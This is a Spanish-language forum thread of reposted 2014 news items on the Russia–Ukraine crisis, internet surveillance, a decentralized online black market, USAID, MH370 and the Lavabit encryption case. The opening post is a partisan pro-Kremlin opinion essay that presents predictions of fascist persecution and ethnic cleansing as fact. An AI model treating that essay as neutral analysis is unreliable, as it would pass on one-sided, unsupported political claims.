Y es aquí donde a los rusos les falla el pensamiento de "colaboración constructiva" con occidente. A EE.UU y sus aliados no les interesa colaborar con Rusia, solo debilitarla hasta convertir al Oso ruso en un gatico domestico cuyo único mecanismo de defensa sea maullar.

Lo peligroso de esto radica en la percepción norteamericana de que esto les traerá "ventajas" estratégicas y por ende en algún momento pueden lanzar un ataque que destruya a su sempiterno enemigo.

Esta apreciación no solo es irreal, sino y muy peligrosa.

Claro que esta estrategia tiene otras aristas. Occidente juega también la carta de la desestabilización y en ello Ucrania puede ser una pieza importante, conjugándose con Georgia, Azerbaizhan y otras ex repúblicas soviéticas que se presten para el juego de Washington.

El empleo de la penetración de toda clase de bandidos y aventureros, incluyendo a muchos de corte fascista, generaría un verdadero caos en distintas regiones de Rusia y convertiría al país en otra Siria o Libia, donde estos grupos trabajarían en vastos espacios difíciles de cubrir  por las fuerzas de seguridad del país y jugarían la carta de la desesperación y el desorden generalizado que tanto daño le hace a la población y de hecho se convierte en un elemento decisivo en la Guerra Psicológica.

Consideremos además que los ucranianos por sus semejanzas con los rusos pueden más fácilmente penetrar las zonas de la periferia occidental rusa y generar una gran confusión, haciéndose pasar por rusos "descontentos" con su gobierno.

Pero estas no son las únicas "perdidas" rusas en la nueva situación creada. Igualmente los sistemas de alerta temprana que se encuentran en Ucrania y Bielorrusia sufrirían, pues las huestes que amenazan con imperar en Kiev, son abiertamente pro occidentales y anti rusas y si en la revolución naranja, jugaron a la democracia en un país con fuertes lazos culturales y étnicos con Rusia, ahora no tendrán contemplaciones e implantaran una dictadura pro occidental al estilo polaco o checo y desencadenaran una persecución contra las fuerzas mayoritariamente pro rusas que generará, además de una limpieza étnica, un éxodo importante hacia la nación vecina.

El tema de Crimea va más allá de la Base Naval que posee Rusia en Sebastopol, pues tiene sus raíces en la historia. Crimea perteneció siempre a Rusia y fue por una decisión arbitraria de Jrushov anexada a Ucrania. La mayoría de su población es de origen ruso aunque hay una importante colonia tártara que desea igualmente pertenecer a Rusia, aunque una pequeña parte está siendo tratada de manipular por occidente para emplearla como fuerza desestabilizadora.

Buena parte de los ucranianos residentes en la zona también poseen fuertes vínculos con Rusia, por lo que su decisión es totalmente comprensible y representa más la corrección de un error histórico que una "anexión", como pretende presentarla occidente.

Pero hay otras situaciones que se avecinan con el "cambio", las nuevas autoridades ucranianas, abiertamente extremistas y pro occidentales, se lanzaran por un lado a ganar méritos con sus socios y trataran de ser mas anti rusos que los propios occidentales. Ya sea por iniciativa propia o por "instrucciones" de sus protectores, se producirán constantes provocaciones y agresiones que caldearán tanto la relación hasta la confrontación directa, lo que será aprovechado por occidente como un pretexto para "defender" a la "agredida" Ucrania por el Gigante ruso.

Lo peligroso de esta situación es que ya se están empezando a producir hechos de esta índole sin que ni siquiera existan autoridades reconocidas en Kiev.

Ya hubo un intento de sacar fuera de servicio a los satélites de comunicación rusos que transmiten para la zona, en evidente acto de Guerra Electrónica.

Un grupo "desconocido" atacó un gasoducto en Crimea que pudo ocasionar un desastre económico y ecológico.

Ya fue detectado por los sistemas de defensa rusos un Drone que realizaba actividades de inteligencia en territorio ruso.

Pero vendrán otras acciones ¿Cuáles?:

Producto de la cercanía se realizaran acciones de guerra radioelectrónica no solo contra vuelos de aviones militares sino y contra vuelos civiles, lo que podrá provocar víctimas inocentes y un gran sentimiento de inseguridad en la población,
Se realizarán provocaciones con vuelos militares, aprovechando el conocimiento que tienen los pilotos ucranianos del territorio ruso y la operatividad de sus fuerzas,
Comenzarán las incursiones a territorio ruso por grupos terroristas que atacarán fundamentalmente objetivos civiles y económicos y generaran un caos en las regiones fronterizas,
Se producirá una verdadera cacería humana contra todo y todos los que representen algo relacionado con Rusia, para lo cual usarán a los grupos de ultraderecha y las fuerzas de la mal llamada Guardia Nacional, heredera de las milicias que crearon los nazis para reprimir al pueblo durante su ocupación,
Igualmente se concentraran los medios masivos de información en manos de los oligarcas que ostentan el control del país para con ello evitar grietas y amordazar la opinión pública nacional,
Por último se desarrollará una campaña de desprestigio contra los rusos y se tratará, como es usual, de convertir a la víctima en victimario y viceversa, lo que permitirá confundir mentes y justificar su accionar.
Hay acciones que ya se han adelantado, como la dependencia de cualquier gobierno ucraniano de occidente, mediante el agobiante peso de la deuda que será utilizada como arma de chantaje.

Lo que nos extraña es la posición rusa de "socio constructivo" con EE.UU y occidente, mientras las fuerzas avanzan hacia sus fronteras de forma vertiginosa.

De solo ver esta grafica donde se muestra el avance de la OTAN sobre Rusia  nos percatamos de las "razones" que deberían tener los rusos para sentirse amenazados.



¿Tendrá algo que ver esto con el tratado Molotov–Ribbentrop durante la Segunda Guerra Mundial en la que los soviéticos  no veían el inminente peligro que la Alemania Nazi representaba para ellos?

Cayó Kiev y ya se puede decir que EE.UU, considerando las características de los medios actuales, está a las puertas de Moscú.

Créanme que me duele decir esto, pero la falta de visión de los dirigentes rusos está llevando a ese noble y esforzado país a la debacle.

Hay múltiples ejemplos de esa aseveración. Los más llamativos son la perdida de aliados claves y el acercamiento de la OTAN a sus fronteras.

¿Cómo es posible que los rusos no se den cuenta de que occidente no tiene buenas intenciones con ellos? ¿Es que acaso la propia existencia de la OTAN a casi 25 años de la desaparición del campo socialista, no es una prueba de la actitud beligerante de EE.UU y sus aliados?

La campaña psicológico-Informativa desarrollada por occidente contra Rusia está surtiendo sus efectos.

Por un lado los alaban como socios, mientras les quitan los mercados. Por otro les hacen creer que sus acciones son positivas (recuerden la campaña en Siria en que se nos hizo creer que la acción de Putin de eliminar las armas químicas que poseía el ejército de ese país evito una guerra, cuando en realidad lo único que logro fue desarmar al agredido y dejar intacto al agresor. En realidad hay que estar ciego para no ver que no solo no se evitó la guerra, esta lleva más de 3 años destruyendo al país y lo ha devaluado a ser un país prehistórico, destruyendo su infraestructura y enconando su mundialmente famoso ecumenismo que ya nadie podrá restablecer).

Por esto hasta le propusieron un Premio Nobel cuyo prestigio es en estos momentos bastante dudoso.

Cuando el enemigo te halaga, revísate.

Las últimas declaraciones de Putin demuestran el nivel de confusión y desorientación en que están los dirigentes rusos:

"¿Pero fue realmente necesario llevarlo a este nivel de anarquía? ¿A un derrocamiento no constitucional y toma de poder por la fuerza, hundiendo después el país en el caos donde está hoy en día?  Creo que es inaceptable.  Y no es la primera vez que nuestros socios occidentales están haciéndolo en Ucrania.  A veces tengo la sensación que en algún lugar por otro lado de ese charco gigantico, en América, hay gente sentado en un laboratorio experimentando, como si fueran experimentando con ratones, sin entender realmente las consecuencias de lo que hacen.  ¿Por qué tenían que hacer esto? ¿Quién lo puede explicar?  No hay explicación ninguna".

¿Es que ahora se entera el Presidente ruso de la labores de desestabilización que se estaban produciendo en Ucrania?

¿Desconocía Putin que el objetivo era hundir al país en el caos para justificar sus acciones?

¿Es Ucrania el primer país donde occidente con EE.UU a la cabeza hace esto? ¿Para donde miraba el Presidente Putin cuando Iraq, Libia, Sudan, Honduras, Venezuela, Ecuador, Bolivia, Nicaragua, Cuba y otros países estaban y siguen siendo desestabilizados por la potencia imperial?

¿Creyó en realidad Vladímir Vladímirovich que a Rusia no le tocaba?

¿Su experiencia como viejo oficial de la KGB, no le enseño nada sobre esto?

Estimado Vladimir, SI HAY EXPLICACION, EE.UU nunca será socio de Rusia, porque en su proyecto hegemónico un país tan grande, potente e independiente, no le cabe. El caos en Ucrania es la antesala del asalto a Moscú y ya es hora de que ustedes lo vean, o ¿es necesario que mueran millones de rusos como ocurrió en la Segunda Guerra Mundial para darse cuenta?

Ni siquiera durante esta Guerra contra el fascismo alemán los EE.UU y occidente fueron "socios" suyos, fueron ellos quienes ayudaron a armar a Hitler y lo lanzaron contra la URSS para después recoger los pedazos de los vencidos. El tercer frente solo se abrió cuando existía el peligro de que las tropas soviéticas liberaran a toda Europa, no fue para acabar con el nazismo, sino para preservar sus intereses.

Créanme, no soy fatalista, confío en el pueblo ruso que será capaz de destruir a cualquiera que intente desestabilizar su país. Muestra de ello han dado de sobra, solo nos queda preguntarnos, a que costo.

La batalla por Moscú está en marcha, solo que ahora no será con grandes concentraciones de tropas y miles de aviones y tanques. Ahora se desarrollará en el plano psicológico-informativo y empleando todo tipo de aventurero, bandido y delincuente que esté dispuesto a poner precio a sus acciones.

Puede ser que Moscú no crea en lágrimas, pero los millones de rusos que se han sacrificado por la nación que tienen y conocen los sufrimientos de sus antepasados llevando con orgullo sus banderas, si creen, y les servirán de fuerza motriz para luchar por su patria, historia y orgullo.

Podría concluir con lo ya expresado, pero sería cobarde hacerlo sin arriesgar un consejo que pudiera servir a los actuales dirigentes rusos y que esbocé en el título de un trabajo anterior: Si los rusos cierran el puño, los norteamericanos se mojan los pantalones.

http://www.elespiadigital.com/index.php/noticias/geoestrategia/5232-alerta-presidente-putin-se-acerca-la-toma-de-moscu-
#108
Un foro internacional sobre internet organizado por Brasil concluyó este jueves que el monitoreo de la información personal debería ser considerado un delito.

Tras dos días de debate, la declaración final de NETMundial también condenó el espionaje en internet.

La reunión, que contó con la presencia de delegaciones de más de 85 países, entre gobiernos y sociedad civil fue convocada por la presidenta brasileña Dilma Rousseff tras revelarse que sus comunicaciones habían sido monitoreadas por la Agencia de Seguridad Nacional de EE.UU.
No todas las delegaciones dieron su respaldo al documento. Rusia dijo que erosiona los principios de la soberanía nacional.
Cuba e India también expresaron su disconformidad con la resolución.
Más temprano, el presidente ruso, Vladimir Putin, afirmó que internet fue originalmente desarrollado por la CIA y que seguía controlado por Estados Unidos.

http://www.bbc.co.uk/mundo/ultimas_noticias/2014/04/140424_ultnot_netmundial_brasil_msd.shtml
#109
A medida que crecen las tensiones en Ucrania, se intensifican las amenazas retóricas y se realizan ejercicios y despliegues militares, una pregunta se ha vuelto inevitable: ¿Qué tan posible es que el conflicto en el este de Europa se convierta en una guerra?



Unos 40.000 soldados rusos se encuentran en la frontera con Ucrania. Moscú ordenó nuevos ejercicios militares. Y su ministro de Relaciones Exteriores, Sergei Lavrov, advirtió que responderá si sus intereses en Ucrania son atacados.

Estados Unidos también comenzó ejercicios militares en la zona. Envió ayuda militar no letal a Ucrania y aumentó su cooperación militar con Polonia y los países del Báltico. Allá, la Organización del Tratado del Atlántico Norte (OTAN) también desplegó barcos para aumentar la seguridad marítima.
Eso sin contar la crisis diplomática. Tanto Rusia como Estados Unidos se culpan el uno al otro de no implementar el acuerdo alcanzado la semana pasada en Ginebra para reducir las hostilidades, lo que es un golpe a la posibilidad de que la crisis pueda ser resuelta a través del diálogo.
Entonces, bajo estas circunstancias, ¿es inevitable una guerra?
clic Lea también: Las opciones de Occidente frente al reto ruso en Ucrania
La respuesta es no, aunque como explica el corresponsal diplomático de la BBC, Jonathan Marcus, los elementos para un conflicto están más que presentes.
Marcus agrega, sin embargo, que es necesaria una aclaración: Puede que una guerra como tal no sea inevitable, pero sí hay una posibilidad preocupante de que se desencadenen enfrentamientos. Los indicios, además, no son positivos.

Opciones rusas


Las tensiones en la zona continúan creciendo.

"En este asunto nada es pulcro. Y las escaramuzas esporádicas y desorganizadas que han ocurrido en el este de Ucrania entre las fuerzas del gobierno y hombres armados prorrusos pueden ser un preludio a lo que está por venir", cuenta.
Una de las opciones es que Rusia organice un ataque a gran escala. Moscú ciertamente tiene suficientes soldados y suministros para lanzar una ofensiva en el este de Ucrania.
De hacerlo, se puede esperar un resistencia significativa de Kiev y las fuerzas rusas podrían verse presionadas hasta el punto de tener que enviar más soldados (quizás menos preparados) para asegurar sus avances.
El otro lado del espectro es que la situación continúe más o menos como está ahora: el despliegue de grupos prorrusos en lugares específicos de Ucrania, disputas esporádicas en edificios y puestos de carretera y, como cree la OTAN, fuerzas especiales rusas en el terreno para ayudar a orquestar los eventos.
La idea de esto sería mantener un sentido de caos, de la inhabilidad del gobierno de Kiev para controlar su propio territorio. El peligro, sin embargo, es que los eventos puedan precipitar una crisis que lleve a una mayor participación rusa.
Una tercera opción, quizás la intermedia, es una intervención limitada de Moscú para "proteger a los habitantes de habla rusa" en un área determinada. El Kremlin insiste en que tiene los fundamentos necesarios en el derecho internacional para hacer algo así, aunque es difícil no pensar que esto generaría una reacción ucraniana. El riesgo, de nuevo, es que aumenten las hostilidades.


El ministro de Relaciones Exteriores de Rusia, Sergei Lavrov, dijo que Washington está "liderando el show".

Respuesta de Occidente

La respuesta de Estados Unidos y Europa dependerá, en gran medida, de cómo se puedan desarrollar estas opciones en el terreno.
Washington ha reiterado una y otra vez que no considera que haya una solución militar a la crisis y ha puesto sus esperanzas públicas en dos canastas: buscar algún tipo de solución negociada para reducir las tensiones y amenazar con más sanciones al gobierno ruso.
Esas amenazas, como explica el corresponsal de BBC Mundo en Washington, Thomas Sparrow, se han vuelto tan comunes en la administración Obama que recientemente el portavoz de la Casa Blanca, Jay Carney, mencionó la palabra "costos" 43 veces para referirse a Rusia en una rueda de prensa de 55 minutos.
El problema, explica Sparrow, es que las dos canastas están frágiles: la posibilidad de una solución negociada sufrió un golpe serio por cuenta de las acusaciones de los últimos días entre Moscú y Washington, mientras las sanciones -aunque sí han debilitado la economía rusa- todavía no logran el cometido de hacer que el Kremlin cambie de rumbo.
Quizás por eso, Occidente ahora está aumentando su presencia militar y tratando de fortalecer el rol de la OTAN como garante de la seguridad regional. No necesariamente quiere una guerra, pero sí quiere fortalecer su mensaje a Moscú de que no está satisfecho con la situación.


El secretario de Estado de EE.UU., John Kerry, criticó fuertemente a Rusia el jueves.

Así mismo, busca prepararse en caso de que las tensiones se agraven y asegurar a algunos vecinos nerviosos de Ucrania de que cuentan con apoyo militar.
Por ahora, la crisis parece haber entrado en una fase en que Rusia, Ucrania y Occidente están contemplando sus posibilidades ante una eventual escalada.
Es una etapa que viene con más preguntas que respuestas: ¿Realmente quiere Rusia incorporar partes del este de Ucrania como hizo con Crimea? ¿Se arriesgará Moscú a sufrir más daños económicos si decide intervenir?
Y en cuanto a Occidente, ¿se ha equivocado en sus cálculos de lo que realmente puede soportar el Kremlin para asegurar sus intereses? ¿Y hasta dónde está dispuesto a llegar para disuadir a Moscú?

http://www.bbc.co.uk/mundo/noticias/2014/04/140425_ucrania_guerra_inevitable_rusia_eeuu_tsb.shtml
#110
Llega el nuevo mercado negro global y en línea capaz de burlar a la Policía y al FBI



Algunos piratas electrónicos no cejan en su intento de 'revivir' un mercado negro en la Red como el famoso Silk Road pero que sea invulnerable. De hecho, ya cuentan con un prototipo que iguala sus propiedades y que le supera ya en popularidad.

Pese al esfuerzo de los creadores del mercado negro Silk Road para hacerlo invencible, la Oficina Federal de Investigación estadounidense (FBI) logró neutralizarlo simplemente incautando su servidor. Para evitar que se repita la historia, su sucesor tiene que estar absolutamente descentralizado, sostienen los creadores de 'Dark Market', el prototipo del nuevo mercado negro global en línea, según la revista 'Wired'.

De esta manera han logrado crear un sistema 'peer-to-peer' totalmente descentralizado. La ausencia de un núcleo implica que para combatirlo la policía tendría que perseguir a cada uno de sus usuarios, algo que resultaría imposible si el nuevo mercado en línea gana la suficiente popularidad. Su concepto ha ganado el primer premio de 20.000 de dólares en el 'Bitcóin hackathon' que se celebró este mes en Toronto.

Pese a que el prototipo del nuevo mercado negro ya existe y es operable, su único problema estriba en que aún le falta anonimidad, ya que cada usuario puede ver la dirección IP de cualquier otro usuario. Para lograr el anonimato los creadores tienen que integrar a su proyecto una protección como Tor. El problema reside en que los creadores están demasiado ocupados con otros proyectos para realizar este cambio inmediatamente.

No obstante, Dark Market ya cuenta con todas las propiedades que forjaron el éxito de Silk Road. Es decir, los usuarios pueden comunicarse de forma privada y realizar transacciones, existen páginas individuales donde los vendedores pueden mostrar sus mercancías, cuenta con un sistema de reputación de usuarios con calificaciones y comentarios, y además proporciona garantías de pago y de recibo de artículos comprados.

Cada usuario puede ser vendedor, comprador, y también actuar de árbitro para que otros usuarios realicen un convenio. El sistema no cuenta con ningún servidor central y funciona a través del software que cada uno de los usuarios descarga e instala en su equipo, permitiendo que cada usuario se ponga en contacto con otros de manera directa. Además, está suficientemente desarrollado para prevenir la posibilidad de fraude. Su moneda de pago es el bitcóin.
 
Los creadores del programa no temen a la policía ni al FBI, argumentando que solo crearon un código fuente del programa. "El código es una forma de expresión, uno no puede ser encarcelado por expresar una idea", dice uno de creadores citado por 'Wired'. En todo caso, la idea de descentralización implica que incluso si los creadores fueran encarcelados, el mercado negro seguiría funcionando como si no hubiera pasado nada.


http://actualidad.rt.com/sociedad/view/126316-presentan-nuevo-mercado-negro-linea-global-invulnerable
#111
Por que usar herramientas tipo squid, Trickle, Bandwidth Controller, LARTC, Wondershaper para administrar el ancho de banda de una red en lugar de hacerlo desde el router cuales son las ventajas y desventajas en mi caso se trata de una red mesh
#112
El panel de control de mi  HP Omni 100 PC el problema no parece ser de virus tnego instalado el Kasperky Internet Security y no detecta virus ya use Tune Up Utilities 2007 y no resuelve el problema.
#113
Las autoridades estadounidenses han criticado la propuesta de la Unión Europea (UE) de crear una red de comunicaciones propia para evitar el flujo transfronterizo de datos electrónicos europeos por las redes estadounidenses.



La medida europea de crear una red de comunicaciones ha sido calificada como "draconiana" por la oficina del Representante Comercial de EE.UU. (USTR, por sus siglas en inglés), informa la agencia Reuters.

En un boletín anual, la USTR subraya que las recientes propuestas de países de la UE de crear una red de comunicaciones únicamente europea o una red de comunicaciones a nivel nacional "podrían conllevar potencialmente la exclusión efectiva o discriminación contra los proveedores de servicios extranjeros que están directamente ofreciendo servicios de redes o que dependen de ellos".

Asimismo, señalan que esta iniciativa violaría las leyes de comercio internacionales.

Tras las revelaciones del excontratista de la CIA Edward Snowden, algunos países europeos, especialmente Alemania y Francia, apoyan la idea de establecer una red de comunicaciones propia para el continente.

http://actualidad.rt.com/actualidad/view/124444-eeuu-critica-europa-espionaje-red-comunicaciones
#114
La Agencia para el Desarrollo Internacional de Estados Unidos (Usaid, por sus siglas en inglés) volvió a ser noticia esta semana cuando una investigación de la agencia de noticias AP reveló que la red social ZunZuneo -conocida también como el "Twitter cubano"- fue un proyecto diseñado con intenciones políticas y que EE.UU. hizo todo lo posible por ocultarlo.



"Se demuestra una vez más que el gobierno de Estados Unidos no ha renunciado a sus planes subversivos contra Cuba, que tienen como propósito crear situaciones de desestabilización para provocar cambios en nuestro ordenamiento político y a lo cual continúa dedicando presupuestos multimillonarios cada año", denunció La Habana en un comunicado de su cancillería.

EE.UU., por su parte, negó que se tratara de un programa encubierto y aseguró que se desarrolló de manera "discreta" debido al "ambiente hostil" que se vive en la isla.
Sin embargo, esta no es la primera vez que la polémica agencia es señalada de injerencia por un gobierno extranjero. ¿De qué se encarga? ¿Cuál es su verdadero papel?

La historia

La Usaid fue creada por una orden ejecutiva del presidente John F. Kennedy en 1961, luego de que el mandatario reconociera que hacía falta "una oficina que se encargara de administrar la ayuda a países extranjeros, para promover el desarrollo social y económico", según se lee en su página web. Cinco décadas más tarde, la agencia dispone de menos del 1% del presupuesto federal que le asigna el Congreso para "prestar ayuda" a más de 100 países.
En conversación con BBC Mundo, su portavoz Matt Herrick aseguró que la agencia se enfoca en fortalecer los derechos humanos, promover gobiernos responsables y transparentes, además de sociedades independientes y políticamente activas.
"Al mismo tiempo estamos comprometidos con actividades que fortalezcan la democracia. No hay diferencia entre lo que hacemos en Cuba, Sudán del Sur, Senegal, Europa del Este o en cualquiera de los países en los que trabajamos", explica Herrick.

Entre sus actividades recientes destaca la contribución de US$29 millones al Programa Mundial de Alimentos de Naciones Unidas para la operación de emergencia que ayuda a los refugiados sirios en Turquía. En su sitio web también afirman que, gracias a las actividades educativas de la Usaid, un total de 21.000 familias de campesinos en Honduras han sido entrenadas en prácticas de cultivo, más de 3 millones de vidas se salvan cada año gracias a los programas de inmunización y más de 50 millones de parejas de todo el mundo han puesto en práctica la planificación familiar.
Señalamientos
Sin embargo, gobiernos de distintos países la han acusado de injerencia en los asuntos internos de las naciones en las que presta ayuda.
La revista Foreign Policy recuerda en un artículo publicado este jueves que durante las décadas de 1960 y 1970, la agencia se asoció con la ahora clausurada Oficina de Seguridad Pública de la CIA, un departamento señalado de formar a cuerpos de seguridad extranjeros en "técnicas de terrorismo y tortura". Aunque la Usaid siempre ha negado participación en este tipo de actividades, en 1973 el Congreso decidió eliminar el programa, debido a que tales acusaciones estaban dañando la imagen pública de EE.UU.
"Cuando el programa fue cerrado, la Usaid ya había ayudado a capacitar a miles de militares y policías en Vietnam, Filipinas, Indonesia, Tailandia y otros países que ahora son tristemente célebres por su trato a los disidentes políticos", señala el artículo.


El empresario Alan Gross fue sentenciado a 15 años de prisión.

En épocas más recientes, las supuestas actividades de intromisión por parte de EE.UU. han sido denunciadas no sólo por Cuba, sino también por países como Venezuela, Bolivia y Rusia.
"Lo que ha hecho la Usaid, al igual que otras organizaciones como la Fundación Nacional para la Democracia (NED, por sus siglas en inglés) y el Instituto Republicano Internacional (IRI), es proveer una especie de cubierta para que el Departamento de Estado financie directamente actividades de la oposición venezolana, incluso a organizaciones que estuvieron vinculadas con el golpe de Estado de abril de 2002 contra el presidente Hugo Chávez", explicó a BBC Mundo George Ciccariello-Maher, profesor de la facultad de Historia y Política de la Drexel University.
Según el académico, el IRI jugó un papel importante en la creación del partido opositor venezolano Primero Justicia, de donde salieron los dirigentes Henrique Capriles y Leopoldo López. "Con la llegada de Chávez al poder -que coincidió con la desintegración de los partidos políticos tradicionales- Estados Unidos se dio cuenta de que la oposición necesitaba un vehículo político y comenzó a financiar y organizar entrenamientos para perfeccionar a estos líderes", asegura el profesor.

En 2009, las autoridades cubanas arrestaron al empresario Alan Gross que luego fue sentenciado a 15 años de prisión por "actos contra la independencia y la integridad territorial del Estado", al intentar ofrecer acceso a internet a opositores como parte de un programa financiado por la Usaid.
Tres años después, Rusia expulsó a la agencia de su territorio por "intentos de influenciar los procesos políticos a través de sus programas" y en 2013, el presidente boliviano Evo Morales acusó a la Usaid de interferir en los asuntos internos y "seguir conspirando" contra su gobierno.
Incluso se ha llegado a sugerir que la Usaid funciona como un frente civil de la CIA que lleva a cabo operaciones secretas.
El portavoz Matt Herrick responde a esas acusaciones: "Somos una agencia de desarrollo, no de inteligencia. Trabajamos en todo el mundo para ayudar a la gente a que ejerciten sus derechos universales y para darles acceso a herramientas que mejoren sus vidas y los conecten con el mundo que está afuera, especialmente en lugares en los que la gente ha sido aislada del mundo".
"Todo nuestro trabajo en Cuba ha sido revisado en detalle por la oficina de contabilidad del gobierno. Las acusaciones de que estamos envueltos en actividades secretas o encubiertas son falsas", concluye el portavoz.


http://www.bbc.co.uk/mundo/noticias/2014/04/140404_eeuu_agencia_usaid_en.shtml
#115
Medios estatales en China indican que una de sus embarcaciones que participa en la búsqueda del avión de Malaysia Airlines detectó una señal de pulso en el sur del Océano Índico.


Las cajas "negras" emiten "pings" para que sea más fácil localizarlas en desastres.

La agencia de noticias china Xinhua indica que el buque patrullero chino Haixun 01, que forma parte de la operación de búsqueda, descubrió la señal con una frecencua de 35,7 khz por segundo, la misma frecuencia que emiten las cajas negras, en las aguas oceánicas el sábado.

Se dice que el buque cuenta con un aparato diseñado para localizar la caja negra con las grabaciones de los registros del avión.
Pero los medios chinos subrayan que todavía no hay indicios de que la señal provenga del vuelo MH370.
Por su parte, la agencia del gobierno australiano que coordina la operación de búsqueda no ha hecho comentarios al respecto.
El Boeing 777 despareció el 8 de marzo una hora después de despegar de Kuala Lumpur hacia Pekín con 239 personas a bordo.
La operación de búsqueda entró el sábado en su fase más intensa con unos diez aviones militares, tres aviones civiles y once embarcaciones encargadas de registrar una vasta zona en el sur Océano Índico, al occidente de Australia.

Contrarreloj


Decenas de barcos y aviones participan en la búsqueda del avión.

Después de cuatro semanas de búsqueda infructuosa, se enfrenta la posibilidad de que las señales que emiten las cajas negras se desvanezcan en los próximos días cuando se agoten sus baterías.
Las cajas negras emiten los llamados "pings", que son señales sonoras, para que en casos de desastre puedan ser localizadas con facilidad. Pero sus baterías duran solo un mes.
Los investigadores están tratando de encontrar restos del avión flotando en el agua o señales de las cajas negras para poder llegar al lugar donde está la aeronave y conocer la causa de su desaparición.
En una conferencia de prensa el sábado en Kuala Lumpur, el ministro de Transporte malasio, Hishammuddin Hussein, señaló que su país "no se daría por vencido" en los esfuerzos para tratar de encontrar el avión y anunció detalles de un equipo multinacional de investigación encargado de resolver el misterio de la desaparición.


Se dice que es una de las operaciones de búsqueda más difíciles que se han enfrentado.

Informó que el equipo involucra a funcionarios y expertos de Australia, que como es el país más cercano a la zona de búsqueda está acutalmente dirigiendo la operación, y otras naciones, como China, Estados Unidos, Reino Unido y Francia, también participan.
Hishammuddin anunció también que será nombrado un investigador independiente y que se establecerán tres áreas principales de indagación.
Una analizará el estado de navegabilidad de la aeronave, incluido el mantenimiento, la estructura y los sistemas. La segunda examinará las operaciones, como las grabaciones de vuelo y la meteorología, y la tercera considerará factores médicos y humanos, señaló el ministro.
Los funcionarios indicaron que la búsqueda del avión malasio es una de las más difíciles que han llevado a cabo y que la operación se complicará aún más si las señales de la caja negra se desvanecen antes de poder localizarla.


http://www.bbc.co.uk/mundo/ultimas_noticias/2014/04/140405_ultnot_avion_senal_men.shtml
#116
El jefe de la Policía de Malasia, el inspector general Khalid Abu Bakar, ha confirmado que la investigación del vuelo MH370 de Malaysia Airlines ha sido clasificada como "investigación criminal", según informó 'The Wall Street Journal'.



Las autoridades de Malasia han confirmado que "alguien en el avión" fue responsable de la desaparición del vuelo Malaysia Airlines, según fuentes oficiales que han expuesto las razones para creer que el avión fue "saboteado".

"El equipo de investigación internacional y las autoridades de Malasia siguen siendo de la opinión de que, hasta el punto en que salió de la cobertura del radar militar, los movimientos del MH370 respondían a la acción deliberada de alguien en el avión", dijo Hishammuddin Hussein, ministro de Transportes en funciones de Malasia.   

Existen tres razones principales por las que los investigadores creen que las maniobras del avión antes de desaparecer el 8 de marzo fueron intencionales:

1. Las comunicaciones fueron desactivadas durante el traspaso entre controladores aéreos de Malasia y Vietnam, momento en que su desaparición de los radares era menos susceptible de ser percibida. 

2. La trayectoria de vuelo no era la usual del avión, lo que parece haber sido programado deliberadamente. 

3. No hay precedentes en la historia de la aviación comercial en los que el satélite de comunicaciones y el transpondedor hayan sido desactivados y el avión continúe volando.

El vuelo MH370 de Malaysia Airlines desapareció de los radares el 8 de marzo, dos horas después de despegar de la capital malasia, Kuala Lumpur, rumbo a Pekín con 227 pasajeros y una tripulación de 12 miembros a bordo.

Tras más de dos semanas de búsqueda, las autoridades de Malasia anunciaron que el Boeing 777 había caído en el océano Índico sin dejar supervivientes. Las operaciones de búsqueda y rescate llevadas a cabo durante varias semanas no han dado ningún resultado. 

http://actualidad.rt.com/actualidad/view/124069-avion-desaparecido-malasia-mh370-investigacion-criminal
#117


En la guerra por el cifrado entre la NSA (Agencia de Seguridad Nacional) y los defensores de la privacidad, ¿quién está ganando?

Ladar Levison está exhausto y se deja caer en un sofá con su perra, Princesa, en su regazo. Está rodeado de cajas, un día después de mudarse a una nueva casa en los suburbios de Dallas, Texas.

Describe su nuevo hogar como un "monasterio para programadores". Levison y sus colaboradores planean vivir y trabajar allí mientras crean un nuevo servicio de correo electrónico que les permitirá a las personas comunicarse de manera totalmente segura y privada.
Su objetivo, dice, es "llevar el cifrado a las masas".
Están haciendo un nuevo servicio de correo electrónico luego de que el propio Levison cerrara el que había - llamado Lavabit - tras haber recibido una visita del FBI.


Levison le dio las claves al FBI impresas en papel.

Todo comenzó con una tarjeta de visita en mayo del año pasado. El FBI estaban detrás de uno de sus clientes. Levison no puede decir quién era, pero todo el mundo sabe que era Edward Snowden, que acababa de salir del país con una pila de documentos secretos y estaba usando su email Lavabit para comunicarse.
La pelea con el FBI derivó en una orden judicial para que Levison entregara las claves y así entrar a su servicio de correo electrónico. Esto dejaría vulnerables a sus 400.000 usuarios, por lo que se le ocurrió un plan. Las claves cifradas consisten en miles de caracteres aparentemente aleatorios.
En lugar de entregarlas en forma electrónica, las imprimió. En letra pequeña. Y entregó la pila de hojas de papel.

"Me encontré con los agentes del FBI en el vestíbulo y les entregué el sobre. El agente del FBI lo miró a contraluz, lo sacudió un poco y me miró con cara de '¿Estas son las claves?' Y yo le dije, 'sí. Las imprimí'".
Levison sabía que el FBI iba a tardar en procesar las claves, lo que le dio tiempo para cerrar todo su sistema. Les había puesto a las máquinas los nombres de sus exnovias, y dice que apagarlas fue una "experiencia surrealista... Ver que todas las luces siguen parpadeando en el éter mientras los usuarios intentan acceder a su correo electrónico a pesar de que el sistema ya estaba apagado".
En el centro del caso de Ladar Levison resuena una pregunta. ¿Queremos que nuestras comunicaciones sean totalmente privadas para que absolutamente nadie aparte del destinatario pueda saber lo que se dice? ¿O estamos dispuestos a permitir el acceso del Estado, por ejemplo, cuando dice que está investigando un crimen o protegiendo la seguridad nacional?
Esta cuestión ha llegado al debate público ahora a causa de Edward Snowden. Pero lo que se conoce como "criptoguerras" existen, de hecho, desde hace 40 años.
1976
Podríamos fechar el comienzo en una reunión en la Universidad de Stanford en California en 1976. De un lado de la mesa estaban un par de matemáticos, Martin Hellman y Whit Diffie. Del otro, un equipo del gobierno federal, incluyendo la NSA.
Hellman y Diffie creían que la NSA le había quitado fuerza deliberadamente a una propuesta de ley para cifrar los datos para permitir que sus supercomputadoras intervinieran las comunicaciones.

También hubo sospechas sobre las llamadas "puertas traseras" (en inglés backdoors, sistema informático que evita los sistemas de seguridad) que le dan a la NSA acceso secreto a las comunicaciones. En un intercambio cada vez más acalorado ambas partes discutían cuánta energía de computadoras hacía falta para saltarse la norma.
"En ese momento yo era Luke Skywalker en La Guerra de las Galaxias", dice Hellman en su casa en el campus de Stanford, "y la NSA era Darth Vader".
Poco después de esa reunión, Diffie y Hellman revolucionaron el mundo de los códigos al publicar un documento sobre un concepto conocido como "cifrado de clave pública".
Hasta entonces, el proceso de cifrado de la información era algo que sólo hacían los gobiernos, pero la clave pública ofreció la oportunidad de que la gente común pudiera comunicarse de manera segura.
